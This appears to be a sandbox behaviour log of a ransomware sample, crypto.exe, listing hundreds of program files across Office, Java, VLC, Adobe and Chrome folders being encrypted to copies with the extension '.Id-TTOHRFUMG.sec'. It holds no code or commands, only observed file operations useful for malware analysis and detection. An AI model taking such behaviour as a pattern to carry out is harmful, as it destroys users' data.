File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Perspective.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME36.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143749.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_On.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Trek.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSAIN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR12F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN075.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libfreetype_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02423_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR1B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\visualization\libgoom_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\cs.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\nio.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\validation.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\psmachine.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\init.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\eula.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02441_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_04.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0286068.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-dock.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234657.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-hot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01148_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00308_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03453_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00178_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Flow.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18204_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_srt_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\resources.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00222_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR43F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18226_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR37F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Defender\MpAsDesc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00212_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01368_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR51B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187893.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Technic.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\Documentation.url.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\ssv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts2.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107344.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01152_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216540.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\1033\VSTAProjectUI.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WSIDBR98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jp2launcher.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21518_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\dt_shmem.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\GroupBackup.ppsx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Belem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00685_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14531_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_bottom.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02280_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libchain_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_kn.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\dtplugin\npdeployJava1.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\ACTIVITL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jaas_nt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\CHEVRON.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00542_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\month.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Gaza.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0279644.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\EssentialMergeLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\wabfind.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icucnv36.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00233_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessData.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\UnregisterStop.midi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\external_extensions.json.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\OLNOTE.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\soniccolorconverter.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\ir.idl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libnsc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01145_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01630_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186360.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_07.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\spu\libaudiobargraph_v_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libgradfun_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00578_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BS4BOXES.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21314_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR16F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285360.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01560_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18217_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libgnutls_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\AUTHZAX.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00272_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar.Id-TTOHRFUMG.sec	crypto.exe
